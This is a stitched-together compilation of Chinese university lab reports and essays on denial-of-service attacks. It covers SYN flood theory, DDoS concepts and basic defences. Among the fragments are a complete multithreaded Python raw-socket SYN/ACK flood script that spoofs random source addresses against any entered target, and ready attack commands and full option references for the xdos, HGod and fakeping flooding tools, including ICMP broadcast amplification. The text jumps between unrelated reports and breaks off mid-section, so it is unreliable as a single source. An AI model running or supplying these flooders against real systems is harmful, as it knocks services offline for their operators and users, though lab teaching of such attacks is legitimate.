网络安全实验报告 - 拒绝服务攻击

实验4：拒绝式服务攻击与防范【实验目的】熟悉SYNflood的攻击原理与过程，及IPv4所存在的固有缺陷。

【实验准备】准备xdos.exe拒绝服务工具。

【注意事项】实验后将DoS黑客软件从机器彻底删除，避免恶意应用影响网络运行。

【实验步骤】一、拒绝式服务攻击拒绝服务攻击的英文意思是Denial of Service，简称DoS。

这种攻击行动使网站服务器充斥大量要求回复的信息，消耗网络带宽或系统资源，导致网络或系统不胜负荷直至瘫痪而停止提供正常的网络服务。

SYN-Flood是当前最常见的一种Dos攻击方式，它利用了TCP协议的缺陷进行攻击用黑客软件xdos.exe对目标计算机进行拒绝服务攻击并运行测试。

（1）计算机a登录到windows 2000，打开sniffer pro,在sniffer pro中配置好捕捉从任意主机发送给本机的ip数据包，并启动捕捉进程。

（2）在计算机B上登录Windows 2000,打开命令提示窗口，运行xdos.exe,命令的格式：‖xdos<目标主机IP>端口号–t 线程数[-s <插入随机IP>’]‖(也可以用―xdos?‖命令查看使用方法)。

输入命令：xdos 192.168.19.42 80 –t 200 –s* 确定即可进行攻击，192.168.19.42 是计算机A的地址。

（3）在A端可以看到电脑的处理速度明显下降，甚至瘫痪死机，在Sniffer Pro的Traffic Map 中看到最大伪造IP的主机请求与A的电脑建立连接。

（4）B停止攻击后，A的电脑恢复快速响应。

打开捕捉的数据包，可以看到有大量伪造IP地址的主机请求与A的电脑连接的数据包，且都是只请求不应答。

以至于A的电脑保持有大量的半开连接。

运行速度下降直至瘫痪死机，拒绝为合法的请求服务。

二、拒绝式服务防范几乎所有的主机平台都有抵御DoS的设置，常见的有以下几种。

(1)关闭不必要的服务。

信息安全与管理专业实训报告学生姓名：一、实训名称：拒绝服务攻击-TCP SYN Flood攻击与防御。

二、实训内容1、kali的安装部署2、SYN Flood攻击演示3、观察受攻击目标的系统状态4、防御措施三、实验步骤1、python攻击代码环境：ubuntu/kali +python 2.7.11使用方法如下：mode有三种模式syn攻击、ack攻击、混合攻击，虽说是支持多线程但是多个线程反而不如单线程快，估计是我的多线程弄得有些问题，麻烦这方面比较懂的朋友帮我指点一下。

我电脑是i7-6700单线程也只能这点速度。

cpu1已经使用89%了看一下抓包情况吧，因为只是测试用我也没带tcp的options字段，报文长度也不够64字节，不过也能传到目的地址。

下面是代码：#!/usr/bin/python#-*-coding:utf-8-*-import socketimport structimport randomimport threadingclass myThread (threading.Thread):def __init__(self,dstip,dstport,mode):threading.Thread.__init__(self)self.dstip = dstipself.dstport =dstportself.mode =modedef run(self):attack(self.dstip,self.dstport,self.mode)def checksum(data):s = 0n = len(data) % 2for i in range(0, len(data)-n, 2):s+= ord(data[i]) + (ord(data[i+1]) << 8) if n:s+= ord(data[i+1])while (s >> 16):s = (s & 0xFFFF) + (s >> 16)s = ~s & 0xffffreturn sdef IP(source,destination,udplen):version = 4ihl = 5tos = 0tl = 20+udplenip_id = random.randint(1,65535)flags = 0offset = 0ttl = 128protocol =6check =0source = socket.inet_aton(source)destination = socket.inet_aton(destination)ver_ihl = (version << 4)+ihlflags_offset = (flags << 13)+offsetip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,check,source,destination)check=checksum(ip_header)ip_header = struct.pack("!BBHHHBBH4s4s",ver_ihl,tos,tl,ip_id,flags_offset,ttl,protocol,socket.htons(check),source,destination)return ip_headerdef TCP(srcip,dstip,protocol,dp,fg):source = socket.inet_aton(srcip)destination = socket.inet_aton(dstip)srcport=random.randint(1,65535)dstport=dpsyn_num=random.randint(1,4000000000)if fg == 2:ack_num=0else:ack_num=random.randint(1,4000000000) hlen=5zero=0flag=fgwindow=8192check=0point=0tcplen=hlenh_f=(hlen << 12)+flagTCP_head=struct.pack("!4s4sHHHHIIHHHH",source,destination,protocol,tcplen,srcport,dstport,s yn_num,ack_num,h_f,window,check,point)check=checksum(TCP_head)TCP_head=struct.pack("!HHIIHHHH",srcport,dstport,syn_num,ack_num,h_f,window,check,point )return TCP_headdef makepacket(dstip,dstport,fg):srcip=str(random.choice(ip_first))+'.'+str(random.randint(1,255))+'.'+str(random.randint(1,255))+'. '+str(random.randint(1,255))protocol=6ippacket=IP(srcip,dstip,5)+TCP(srcip,dstip,protocol,dstport,fg)return ippacketdef attack(dstip,dstport,mode):if mode == 'syn':fg=2while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'ack':fg=18while 1:data=makepacket(dstip,dstport,fg)s.sendto(data,(dstip,dstport))elif mode == 'syn&ack':while 1:data=makepacket(dstip,dstport,2)s.sendto(data,(dstip,dstport))data=makepacket(dstip,dstport,18)s.sendto(data,(dstip,dstport))else:print 'DON\'T xia say!'dstip=raw_input('attack IP:')dstport=int(input('attack PORT:'))mode=raw_input('mode:(syn or ack or syn&ack)') threads=int(input("线程数threads："))ip_first=[]for i in range(1,10):ip_first.append(i)for i in range(11,172):ip_first.append(i)for i in range(173,192):ip_first.append(i)for i in range(193,224):ip_first.append(i)s = socket.socket(socket.AF_INET,socket.SOCK_RAW,6) s.setsockopt(socket.IPPROTO_IP,socket.IP_HDRINCL,1)threads_name=[]for i in range(threads):threads_name.append('teread'+str(i))for i in range(threads):threads_name[i]=myThread(dstip,dstport,mode)for i in range(threads):threads_name[i].start()2、C语言攻击代码环境：ubuntu/kali gcc version 6.1.1 20160802 (Debian 6.1.1-11)使用方法：支持两个参数目的ip和目的端口性能：限制发包速度的是带宽（我这是100M的网，除去报文的前导码和帧间隔极限速度差不多就是9m左右了），cpu利用才27%，我在1000Mbps的网速下测试，单线程的话速度能到40m左右，cpu占用率大约85%左右。

网络安全测试中的拒绝服务攻击与防范网络安全在当今信息时代的重要性不言而喻，随着科技的快速发展，人们越来越依赖于网络进行各种活动。

然而，网络的普及也带来了一系列的安全威胁，其中之一就是拒绝服务攻击（Denial of Service，DoS）。

本文将探讨网络安全测试中的拒绝服务攻击与防范方法。

一、拒绝服务攻击的定义与原理拒绝服务攻击是指攻击者通过发送大量的请求，占用目标系统的全部或部分资源，导致合法用户无法正常访问该系统的情况。

攻击者通过消耗目标系统的带宽、计算资源或存储资源等方式，造成系统负载过高而无法响应合法用户的请求。

拒绝服务攻击的原理在于攻击者通过发送大量的恶意请求，耗尽目标系统的资源，从而引发系统崩溃或运行缓慢。

常见的拒绝服务攻击手段包括：泛洪攻击（Flood Attack）、碎片攻击（Fragmentation Attack）、应用层攻击（Application Layer Attack）等。

二、拒绝服务攻击的影响拒绝服务攻击给目标系统带来了严重的影响，其中包括以下几个方面：1. 网站瘫痪：拒绝服务攻击会导致目标网站无法正常运行，用户无法访问网站，给网站运营者带来巨大的经济损失。

2. 数据泄露：攻击者利用拒绝服务攻击的机会，可能获取并窃取系统中的重要数据，给用户和机构带来隐私泄露的风险。

3. 声誉受损：拒绝服务攻击会导致目标系统长时间不可用，使得用户对该系统的可靠性和稳定性产生质疑，进而对企业的声誉造成损害。

三、拒绝服务攻击的防范方法为了保护系统免受拒绝服务攻击的影响，需要采取一系列的防范措施。

下面是几种常见的防范方法：1. 增加带宽：通过增加带宽的方式，可以提高系统对大规模攻击的抵御能力。

这样系统能够更快地缓解攻击期间的负载压力。

2. 流量过滤：利用防火墙、入侵检测系统（IDS）等安全设备对流量进行过滤和识别，屏蔽恶意流量和异常请求，过滤掉拒绝服务攻击。

3. 负载均衡：通过负载均衡技术，将流量分散到多台服务器上，分摊压力，提高系统的稳定性和可靠性，从而减轻拒绝服务攻击的影响。

拒绝服务攻击的叙述
拒绝服务攻击（Denial of Service Attack，简称DoS攻击）是
指通过向目标系统发送大量无效或恶意请求，使目标系统无法正常提
供服务的一种网络攻击手段。

在拒绝服务攻击中，攻击者利用自己的计算机或控制的僵尸网络（botnet）向目标系统发送大量的网络请求，以消耗目标系统的带宽、计算资源或存储资源。

这样一来，目标系统就无法处理正常的用户请求，从而造成服务不可用的情况。

DoS攻击的目的通常是瘫痪目标系统或网络，使其无法正常工作，阻止合法用户访问该系统或网络。

这种攻击方式可以导致目标系统的
服务暂时中断或长时间停止服务，给其运营者和用户带来极大的不便。

为了进行拒绝服务攻击，攻击者通常采用各种手段，如洪水攻击、缓冲区溢出攻击、合成流量攻击等。

无论使用何种攻击手段，其最终
目的都是占用目标系统的资源，使其无法正常运行。

为了防止拒绝服务攻击，系统管理员可以采取一系列措施，如增加带
宽容量、使用入侵检测和预防系统、过滤恶意请求等等。

此外，监控
系统日志、定期备份数据以及设置灾备方案也是必要的防御措施。

由于拒绝服务攻击具有易于实施、难以追踪的特点，对于网络安
全的保护和预防是至关重要的。

及时发现并应对拒绝服务攻击，对于
保障系统和网络的正常运行非常重要。

华北电力大学
实验报告|
|
实验名称拒绝服务攻击实验
课程名称网络攻击与防范
|
|
专业班级：网络学生姓名：
学号：成绩：
指导教师：曹锦纲实验日期：
3、此时打开百度页面，可以看到能抓到所有发给PC2的ip数据包。

4、在PC1上打开XDos.exe，命令的格式为：xdos <目标主机IP> 端口号 -t 线程数 [-s <插入随机IP>]。

输入命令：xdos 192.168.137.3 80 -t 200 -s*，回车即可攻击，192.168.137.3是PC2的IP地址。

5、在PC2中可以看到大量伪造IP地址的主机请求与PC2的电脑建立连接。

且能通过捕捉到的数据包看到都是只请求不应答，以至于PC2保持有大量的半开连接。

6、停止攻击后，PC2不再接收到数据包。

五、拒绝式服务防范
几乎所有的主机平台都有抵御DoS的设置，常见的有以下几种：
（1）关闭不必要的服务。

（2）限制同时打开的Syn半连接数目。

（3）缩短Syn半连接的time out时间。

（4）及时更新系统补丁.
六、实验心得与体会。

信息安全——拒绝服务式攻击班级：９班姓名：周杰学号：53080907一.实验设计1.使用sniffer 工具网络监听。

2.使用sniffer 工具对监听到得网络数据进行分析3.进行拒绝服务攻击4.使用sniffer 软件监视网络状态 二.实验步骤步骤1 用sniffer 抓icmp 和IP 包1．设置过滤器，在地址中设置捕获IP 数据，（注意，位置1处必须填本机的IP 地址），在高级中选择IP 协议里面的ICMP 协议，如图所示：图1图 22．使用ping 命令时进行捕获：选择“捕获开始”按钮→运行ping 命令，ping 任意主机→当“捕获停止并查看”按钮变成黑色时，点击它位置1图3在弹出的对话框中点击“解码系统”就可以看到捕获的数据了图4将捕获到的图粘帖在下方抓包分析如图：图 5图 6步骤2 使用Sniffer 软件监视网络的状态1．在被攻击的主机上打开Sniffer Pro ，选择Monitor/Matrix 命令，打开Traffic Map 视图，可以查看任意主机发给被攻击主机的IP 数据包。

图7 将打开的Traffic Map视图粘帖在下方：2.查看当前的报文统计，打开Dashbord面板统计平均数据或总和为统计图选择统计指标图8步骤3使用HGod拒绝服务攻击软件注意：部分杀毒软件可把此程序当成病毒杀掉，所以在使用时可能需要关闭杀毒软件将该软件直接解压到磁盘根目录下，如D:运行“开始”→“运行”，输入“cmd”，打开cmd命令行对话窗口输入“cd\”直接退到磁盘根目录下，进入D盘盘符，如图所示图9运行HGod拒绝服务攻击工具对某台主机进行攻击图10<Target>为要攻击的目标,可以是计算机名,域名或者IP地址.<StartPort> 为要攻击的目标端口. IGMP/ICMP攻击模式可以随便设置一个端口如果是SYN Flood可以支持多端口同时攻击.如SYN Flood攻击20-80的端口,则设为20-80如SYN Flood攻击21,23,80端口,则设为21,23,80. 端口总数不能多于100个.[Option] 为攻击参数选项.各参数如下:-a:AttackTime 为攻击时间选项,为0-14400分钟, 设0为一直攻击, 默认为0.如果要攻击1个小时, 请设为-a:60如果要攻击1天, 请设为-a:1440最大设为10天.大于10天,请不要设置.-b:Packsize 为攻击时发送的数据包大小, 为1-65400比特. (SYN Flood 不用设置包大小.)如果定制数据包的大小为10000, 请设为 -b:10000-d:Delay 为发送数据包之间的延时, 为0-1000ms. 默认为10ms. (SYN Flood 不用设置延时.)如果定制延时为1ms, 请设为-b:1-l:Speed 网络连接速度选择, 为1-200M, 只为SYN Flood攻击参数. 如果你的网速小于10M, 必须设置.如果你的网速为<1M, 请设为 -l:1如果你的网速为<2M, 请设为 -l:2类推, 程序自动设置最佳攻击方式.-m:Mode 使用的攻击种类, 为SYN/UDP/ICMP/IGMP, 默认为SYN.如果你要使用IGMP炸弹攻击, 请使用-m:igmp-n:Num 设置源IP变化的范围, 可以设为1-65535. 只为SYN Flood攻击参数.如果你想源IP变化的范围为一个c段, 请使用 -n:255 -p:SourcePort设置攻击时的源端口, 默认为不用设置, 程序自动产生随机源端口并封装. ICMP/IGMP不用设置.如果你设端口为80, 请使用-p:80 -s:SourceIP 设置攻击时的源IP地址, 默认为不用设置, 程序自动产生随机IP并封装, IGMP不用设置.如果设源IP为192.168.0.1, 请使用-s:192.168.0.1ICMP攻击模式中, 你可以设攻击IP为源IP, 把目标IP设为一个广播地址. 这样可以让源IP收到多倍的数据包.-t:Thread 攻击时使用的线程数, 为1-100, 默认为10个线程.如果要设为使用1个线程进行攻击, 请使用 -t:1按照用法对某台主机进行攻击,比如输入：hgod 192.168.0.1 80hgod 192.168.0.1 21,23,80 -t:20 -l:10 -s:192.168.0.1 -n:65535hgod 192.168.0.255 4000 -m:icmp -t:20 -d:1 -s:192.168.0.1hgod 192.168.0.1 4000 -m:igmp -d:1 -a:1000步骤4 在被攻击主机上使用Sniffer查看计算机的处理速度三.参考文献：［1］李德全著，拒绝服务攻击，电子工业出版社，第一版。

拒绝服务攻击及预防措施拒绝服务攻击（Denial-of-Service Attack，简称DoS攻击）是一种常见的网络攻击方式，它以意图使目标系统无法正常提供服务的方式进行攻击，给网络安全带来了严重的威胁。

本文将介绍拒绝服务攻击的原理和常见类型，并提供一些预防措施以保护系统免受此类攻击的影响。

一、拒绝服务攻击的原理拒绝服务攻击的核心原理是通过向目标系统发送大量的请求，耗尽其处理能力或网络带宽，从而使其无法对合法用户提供正常服务。

攻击者可以利用多种方式进行DoS攻击，下面是一些常见的攻击类型：1. 集中式DoS攻击（Conventional DoS Attack）集中式DoS攻击是指通过一个或多个源（攻击者）向目标服务器发送大量请求。

这种攻击利用了网络协议本身的设计漏洞或系统资源限制，例如TCP/IP握手过程中的资源消耗问题，使得目标服务器无法正常处理合法用户请求。

2. 分布式拒绝服务攻击（Distributed Denial-of-Service Attack，简称DDoS攻击）分布式拒绝服务攻击是由多个不同的源（攻击者）同时向目标系统发起攻击，通过同时攻击的规模和多样性来超过目标系统的处理能力。

攻击者通常通过僵尸网络（Botnet）来执行此类攻击。

二、拒绝服务攻击的预防措施为了有效地应对拒绝服务攻击，以下是一些常见的预防措施：1. 增加网络带宽网络带宽是系统处理大量请求的关键资源之一。

增加网络带宽可以提高系统的处理能力，减轻拒绝服务攻击带来的影响。

同时，合理使用流量限制等机制可以控制并阻止一些恶意流量对系统的影响。

2. 强化网络设备和操作系统的安全性网络设备和操作系统的安全性是防范拒绝服务攻击的重要环节。

更新并及时修补设备和操作系统的安全漏洞，使用最新的防火墙、入侵检测系统和安全软件等网络安全工具来检测和阻止攻击流量。

3. 流量过滤和负载均衡通过使用流量过滤和负载均衡等技术，可以识别和过滤掉来自攻击者的恶意流量，将合法用户的请求分配到不同的服务器中进行处理，从而防止拒绝服务攻击对目标系统造成影响。

网络攻防对抗实验报告实验名称：拒绝服务攻击（实验五）指导教师：专业班级：姓名：学号： ______电子邮件：___ 实验地点：实验日期：实验成绩：____________________一、实验目的1. 通过练习使用DoS／DDoS攻击工具对目标主机进行攻击；2．理解DoS／DDoS攻击的原理及其实施过程；3．掌握检测和防范DoS／DDoS攻击的措施。

二、实验原理1. 拒绝服务（DoS）攻击这是一种非常有效的攻击技术，它利用协议或系统的缺陷，采用欺骗的策略进行网络攻击，最终目的是使目标主机因为资源全部被占用而不能处理合法用户提出的请求，即对外表现为拒绝提供服务。

有几种常见的DoS攻击方法：(1)Synflood:该攻击以多个随机的源主机地址向目的主机发送SYN 包，而在收到目的主机的SYN ACK后并不回应，这样，目的主机就为这些源主机建立了大量的连接队列，而且由于没有收到ACK一直维护着这些队列，造成了资源的大量消耗而不能向正常请求提供服务。

(2)Land-based：攻击者将一个包的源地址和目的地址都设置为目标主机的地址，然后将该包通过IP欺骗的方式发送给被攻击主机，被攻击主机与自己建立空连接并保留连接，从而很大程度地降低了系统性能。

(3)洪水(UDP flood) ：echo服务会显示接收到的每一个数据包，而chargen服务会在收到每一个数据包时随机反馈一些字符。

UDP flood 假冒攻击就是利用这两个简单的TCP/IP 服务的漏洞进行恶意攻击，通过伪造与某一主机的Chargen服务之间的一次的UDP 连接，回复地址指向开着Echo 服务的一台主机，通过将Chargen和Echo服务互指，来回传送毫无用处且占满带宽的垃圾数据，在两台主机之间生成足够多的无用数据流，这一拒绝服务攻击飞快地导致网络可用带宽耗尽。

(4)Smurf、UDP-Flood、Teardrop、PingSweep、Pingflood、Ping of Death2. DDoS的原理分布式拒绝服务（DDoS）是基于DoS攻击的一种特殊形式。

网络安全原理与应用系别：计算机科学与技术系班级：网络信息与技术姓名：x x x 学号：xxxxxxxxxxxxx拒绝服务攻击原理、常见方法及防范什么是DOS攻击DOS :即Denial Of Service，拒绝服务的缩写，可不能认为是微软的dos操作系统了。

DOS攻击即攻击者想办法让目标机器停止提供服务或资源访问，这些资源包括磁盘空间、内存、进程甚至网络带宽，从而阻止正常用户的访问。

比如：试图FLOOD服务器，阻止合法的网络通讯*破坏两个机器间的连接，阻止访问服务*阻止特殊用户访问服务*破坏服务器的服务或者导致服务器死机不过，只有那些比较阴险的攻击者才单独使用DOS攻击，破坏服务器。

通常，DOS攻击会被作为一次入侵的一部分，比如，绕过入侵检测系统的时候，通常从用大量的攻击出发，导致入侵检测系统日志过多或者反应迟钝，这样，入侵者就可以在潮水般的攻击中混骗过入侵检测系统。

DoS的攻击方式有很多种，最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源，从而使合法用户无法得到服务的响应。

DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。

单一的DoS攻击一般是采用一对一方式的，当攻击目标CPU速度低、内存小或者网络带宽小等等各项性能指标不高它的效果是明显的。

随着计算机与网络技术的发展，计算机的处理能力迅速增长，内存大大增加，同时也出现了千兆级别的网络，这使得DoS攻击的困难程度加大了-目标对恶意攻击包的”消化能力”加强了不少，例如你的攻击软件每秒钟可以发送3,000个攻击包，但我的主机与网络带宽每秒钟可以处理10,000个攻击包，这样一来攻击就不会产生什么效果。

这时侯分布式的拒绝服务攻击手段（DDoS ）就应运而生了。

你理解了DoS攻击的话，它的原理就很简单。

如果说计算机与网络的处理能力加大了10倍，用一台攻击机来攻击不再能起作用的话，攻击者使用10台攻击机同时攻击呢？用100台呢？DDoS就是利用更多的傀儡机来发起进攻，以比从前更大的规模来进攻受害者。

实验五报告课程名称计算机网络安全实验成绩实验名称拒绝服务攻击与防范实验学号姓名班级日期课程设计报告一、实验目的及要求：1.实验目的通过本实验对DoS/DDoS攻击的深入介绍和实验操作；了解DoS/DDoS攻击的原理和危害，并且具体掌握利用TCP、UDP、ICMP等协议的DoS/DDoS 攻击原理；了解针对DoS/DDoS攻击的防范措施和手段。

通过实验掌握DoS/DDoS攻击的原理；2.实验要求(1)使用拒绝服务攻击工具对另一台主机进行攻击。

(2)启动进行抓包工具，并分析TCP、UDP、ICMP等协议的DoS/DDoS攻击原理与危害。

(3)给出针对DoS/DDoS攻击的防范措施和手段。

二、实验过程及要点：实验过程:攻击机（192.168.13.33）目标机（192.168.13.22）原理：SYN攻击属于DOS攻击的一种，它利用TCP协议缺陷，通过发送大量的半连接请求，耗费CPU和内存资源。

此次模拟攻击为虚拟大量IP与目标建立不完整三次握手连接。

SYN Flood攻击的过程在TCP协议中被称为三次握手(Three-way Handshake)，而SYN Flood拒绝服务攻击就是通过三次握手而实现的。

(1) 攻击者向被攻击服务器发送一个包含SYN标志的TCP报文，SYN(Synchronize)即同步报文。

同步报文会指明客户端使用的端口以及TCP连接的初始序号。

这时同被攻击服务器建立了第一次握手。

(2) 受害服务器在收到攻击者的SYN报文后，将返回一个SYN+ACK的报文，表示攻击者的请求被接受，同时TCP序号被加一，ACK(Acknowledgment)即确认，这样就同被攻击服务器建立了第二次握手。

(3) 攻击者也返回一个确认报文ACK给受害服务器，同样TCP序列号被加一，到此一个TCP连接完成，三次握手完成。

具体原理是：TCP连接的三次握手中，假设一个用户向服务器发送了SYN报文后突然死机或掉线，那么服务器在发出SYN+ACK应答报文后是无法收到客户端的ACK报文的(第三次握手无法完成)，这种情况下服务器端一般会重试(再次发送SYN+ACK给客户端)并等待一段时间后丢弃这个未完成的连接。

一、实验目的通过本次网络安全实验，使学生了解网络安全的基本概念和原理，掌握常见的网络安全技术，提高学生的网络安全意识和实际操作能力。

二、实验内容1. 拒绝服务攻击检测实验2. 路由器配置实验3. APP欺骗攻击与防御实验4. 源IP地址欺骗攻击防御实验5. DHCP欺骗攻击与防御实验6. 密码实验7. MD5编程实验8. 数字签名综合实验9. RIP路由项欺骗攻击实验10. 流量管制实验11. 网络地址转换实验12. 防火墙实验13. 入侵检测实验14. WEP配置实验15. 点对点IP隧道实验三、实验过程1. 拒绝服务攻击检测实验实验步骤：（1）搭建实验环境，配置实验参数；（2）模拟拒绝服务攻击，观察系统响应；（3）分析日志文件，查找攻击痕迹；（4）总结实验结果，撰写实验报告。

实验结果：通过实验，掌握了拒绝服务攻击的原理，学会了检测和防御拒绝服务攻击的方法。

2. 路由器配置实验实验步骤：（1）搭建实验环境，配置实验参数；（2）学习路由器配置的基本指令；（3）正确配置路由器，实现网络互连互通；（4）验证网络连通性，检查配置效果；（5）总结实验结果，撰写实验报告。

实验结果：通过实验，掌握了路由器配置的基本方法，实现了网络的互连互通。

3. APP欺骗攻击与防御实验实验步骤：（1）搭建实验环境，配置实验参数；（2）模拟APP欺骗攻击，观察系统响应；（3）分析日志文件，查找攻击痕迹；（4）总结实验结果，撰写实验报告。

实验结果：通过实验，了解了APP欺骗攻击的原理，学会了防御APP欺骗攻击的方法。

4. 源IP地址欺骗攻击防御实验实验步骤：（1）搭建实验环境，配置实验参数；（2）模拟源IP地址欺骗攻击，观察系统响应；（3）分析日志文件，查找攻击痕迹；（4）总结实验结果，撰写实验报告。

实验结果：通过实验，掌握了源IP地址欺骗攻击的原理，学会了防御源IP地址欺骗攻击的方法。

5. DHCP欺骗攻击与防御实验实验步骤：（1）搭建实验环境，配置实验参数；（2）模拟DHCP欺骗攻击，观察系统响应；（3）分析日志文件，查找攻击痕迹；（4）总结实验结果，撰写实验报告。

实验 23 拒绝服务攻击拒绝服务攻击的目的就是让被攻击目标无法正常地工作，的连接速度减慢或者完全瘫痪，那么攻击者的目的也就达到了。

从攻击方式的解释看来，而在被攻击的一方看来，目标当遭到攻击时，系统会出现一些异常的现象。

练习一洪泛攻击【实验目的】理解带宽攻击原理理解资源消耗攻击原理掌握洪泛攻击网络行为特征【实验人数】每组 2人【系统环境】Windows【网络环境】企业网络结构【实验工具】Nmap洪泛工具网络协议分析器【实验原理】见《原理篇》实验23｜练习一。

【实验步骤】本练习主机A、B 为一组， C、 D为一组， E、 F 为一组。

实验角色说明如下：实验主机实验角色主机 A、 C、E攻击者（扫描主机）主机 B、 D、F靶机（被扫描主机）首先使用“快照X”恢复 Windows 系统环境。

一． SYN洪水攻击1．捕获洪水数据（1）攻击者单击实验平台工具栏中的“协议分析器”按钮，启动协议分析器。

单击工具栏“定义过滤器”按钮，在弹出的“定义过滤器”窗口中设置如下过滤条件：在“网络地址”属性页中输入“any<-> 同组主机IP地址”；在“协议过滤”属性页中选中“协议树”｜“ETHER”｜“ IP ”｜“ TCP”结点项。

单击“确定“按钮使过滤条件生效。

单击“新建捕获窗口”按钮，点击“选择过滤器”按钮，确定过滤信息。

在新建捕获窗口工具栏中点击“开始捕获数据包”按钮，开始捕获数据包。

2．性能分析（ 1）靶机启动系统“性能监视器”，监视在遭受到洪水攻击时本机CPU、内存消耗情况，具体操作如下：依次单击“开始”｜“程序”｜“管理工具”｜“性能”。

在监视视图区点击鼠标右键，选择“属性”打开“系统监视器属性”窗口，在“数据”属性页中将“计数器”列表框中的条目删除；单击“添加”按钮，打开“添加计数器”对话框，在“性能对象”中选择“TCPv4”，在“从列表选择计数器”中选中“Segments Received/sec ”, 单击“添加”按钮，然后“关闭”添加计数器对话框；单击“系统监视器属性” 对话框中的“确定” 按钮，使策略生效。

安全测试中的拒绝服务攻击检测方法拒绝服务攻击（Denial of Service, 简称DoS）是一种旨在使目标计算机或网络资源无法正常工作的攻击手段。

在安全测试中，检测和防范拒绝服务攻击是至关重要的。

一、什么是拒绝服务攻击拒绝服务攻击指通过发送大量非法请求或利用漏洞，使目标系统无法响应合法用户请求，从而瘫痪网络或服务器的攻击行为。

这种攻击对于企业和个人用户来说都可能造成严重的影响，如系统崩溃、减慢网速或无法访问某些网站等。

拒绝服务攻击可以分为两类：弱攻击和强攻击。

弱攻击主要通过耗尽目标系统的资源，如带宽、内存或处理能力，以达到拒绝服务的目的。

强攻击则是利用漏洞或恶意代码来直接瘫痪目标系统。

二、常见的拒绝服务攻击方法1. SYN Flood攻击SYN Flood攻击是一种典型的网络层拒绝服务攻击，攻击者通过发送大量伪造的TCP连接请求（SYN包），占用目标系统的资源，使其无法正常工作。

这种攻击能够迅速耗尽系统的处理能力，导致系统崩溃或无法响应合法用户请求。

2. UDP Flood攻击UDP Flood攻击是基于用户数据报协议（UDP）的一种拒绝服务攻击方法。

攻击者通过向目标主机发送大量的UDP数据包，占用目标系统的带宽和处理能力，使其无法正常运作。

与TCP Flood攻击不同，UDP Flood攻击不需要建立连接，因此更容易实施。

3. HTTP Flood攻击HTTP Flood攻击是针对Web服务器的拒绝服务攻击，攻击者通过发送大量的HTTP请求，占用服务器资源，使其无法正常响应合法用户的请求。

这种攻击常常伪装成合法的请求，难以区分，对于大规模的网站来说，可能导致系统崩溃。

三、拒绝服务攻击检测方法针对拒绝服务攻击的检测方法主要包括以下几个方面：1. 流量分析通过对网络流量进行监测和分析，可以检测到异常流量模式。

拒绝服务攻击通常会导致网络流量突增，出现异常的流量模式，如大量的同源请求或源IP地址集中在某个范围等。

实验内容与步骤：<SYN攻击实验>【实验步骤】一、登录到Windows实验台中登录到Windows实验台，并从实验工具箱取得syn攻击工具XDoc。

二、Windows实验台cmd下运行xdos攻击工具Xdos运行界面如图所示。

Xdos命令举例演示如下：xdos 192.168.1.43 139 –t 3 –s 55.55.55.55172.20.1.19 为被攻击主机的ip地址（实验时请以被攻击主机真实ip为准）139为连接端口-t 3 表示开启的进程-s 后跟的ip地址为syn数据包伪装的源地址的起始地址图1运行显示如图，Windows实验台正在对本地发送syn数据包。

图2在目标主机使用wireshark抓包，如图所示，可以看到大量的syn向172.20.1.19主机发送，并且将源地址改为55.55.55.55后面的ip地址。

图3三、本地主机状态在目标主机使用命令netstat -an查看当前端口状态，如图所示，就会发现大量的syn_received状态的连接，表示172.20.1.19主机接受到syn数据包，但并未受到ack确认数据包，即tcp三次握手的第三个数据包。

图4 查看本地网络状态当多台主机对一台服务器同时进行syn攻击，服务器的运行速度将变得非常缓慢。

<ICMP攻击实验>【实验步骤】(1)启动fakeping从实验箱取得fakeping工具，在本地主机上启动fakeping，如图所示；图5Fakeping使用如下：Fakeping 伪装的源地址(即被攻击主机地址) 目的地址（除本机地址和伪装源地址以外，可以ping通伪装源地址的主机地址）数据包大小举例演示：fakeping 172.20.3.43 172.20.1.7 100在本地主机向172.20.1.7 发送伪装icmp请求信息，请求信息的伪装源地址为172.20.3.43。

如图所示。

图6 攻击过程(2)监听本地主机（172.20.1.7）上的icmp数据包，启动wireshark抓包工具，并设置数据包过滤器为“icmp”：图7图8如图所示，并未收到相应的icmp响应数据包及icmp reply。